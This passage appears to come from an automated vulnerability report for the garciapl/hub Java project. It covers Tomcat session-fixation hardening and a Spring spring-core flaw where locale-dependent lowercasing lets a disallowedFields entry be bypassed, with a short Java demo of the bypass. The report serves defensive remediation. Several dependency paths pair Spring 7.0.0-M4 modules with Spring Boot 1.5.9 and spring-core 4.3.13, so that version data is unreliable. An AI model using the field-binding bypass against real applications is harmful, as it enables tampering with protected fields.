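        HttpSession session = req.getSession(true);   // create one if the client had none
        String before = session.getId();

        // Hardened form: keep the session's attributes but issue a fresh identifier.
        // changeSessionId() throws IllegalStateException without a session, hence the
        // getSession(true) above. On Servlet 3.0 containers the equivalent is
        // session.invalidate() followed by req.getSession(true).
        String after = req.changeSessionId();
        session.setAttribute("user", user);

        resp.setContentType("text/plain");
        resp.getWriter().println("rotated " + before + " -> " + after);
    }
}
```

Rotating after authentication, rather than before the login form is shown, is what matters: the attacker's fixed identifier must be dead by the time it would be worth anything.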

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.30, 8.5.50, 7.0.99 or higher.

References

low severity

Improper Handling of Case Sensitivity

  • Vulnerable module: org.springframework:spring-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework:spring-core@4.3.13.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-web@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-web@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-core@4.3.13.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-web@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-web@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-core@4.3.13.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE

…and 24 more

Overview

org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.

Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity because the case-insensitive comparison relies on String.toLowerCase(), whose result depends on the JVM's default Locale (for example the Turkish dotted and dotless i). A field name that should match a disallowedFields pattern can therefore fail to match, leaving that field unprotected.

Note:

The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive.

This vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.
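The following is an added example (not Spring's code nor garciapl/hub's) of the locale dependency the note describes: the same field name folded under a Turkish locale and under Locale.ROOT, and a pattern check showing which one lets a disallowed field through. The @InitBinder method shows how a controller declares the protection; it assumes spring-web on the classpath, and the Account bean and the field names are constructed for the example.

```java
import java.util.Locale;
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.InitBinder;

public class CaseFoldingDemo {

    // Bean a controller binds request parameters into; "id" must never come from the client.
    public static class Account {
        public String id;
        public String name;
    }

    // Weak form: folding with whatever Locale the JVM defaults to. Under tr-TR,
    // "ID".toLowerCase() yields "\u0131d" (dotless i), which is not equal to "id".
    static String foldWithLocale(String field, Locale locale) {
        return field.toLowerCase(locale);
    }

    // Hardened form: fold with Locale.ROOT, so the result is identical on every host
    // regardless of the operator's system locale.
    static String foldRoot(String field) {
        return field.toLowerCase(Locale.ROOT);
    }

    // Whether a request field name hits a disallowed pattern after folding both sides
    // with the given locale (exact-name patterns only, for the purpose of the demo).
    static boolean blocked(String requestField, String disallowedPattern, Locale locale) {
        return foldWithLocale(requestField, locale).equals(foldWithLocale(disallowedPattern, locale));
    }

    // How a Spring MVC controller declares the protected field. The comparison behind
    // this call is the one that must be locale-independent.
    @InitBinder
    void protectId(WebDataBinder binder) {
        binder.setDisallowedFields("id");
    }

    public static void main(String[] args) {
        Locale turkish = Locale.forLanguageTag("tr-TR");
        System.out.println(foldWithLocale("ID", turkish));        // ıd  (U+0131 then d)
        System.out.println(foldRoot("ID"));                       // id
        System.out.println(blocked("ID", "id", turkish));         // false: "ID" from the client gets bound
        System.out.println(blocked("ID", "id", Locale.ROOT));     // true
    }
}
```

The practical check is the first println: run it with -Duser.language=tr -Duser.country=TR on any string comparison that is supposed to be case-insensitive, and anything that prints a dotless i is a comparison that will behave differently in production than on a developer's machine.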

Remediation

Upgrade org.springframework:spring-core to version 6.1.14 or higher.

References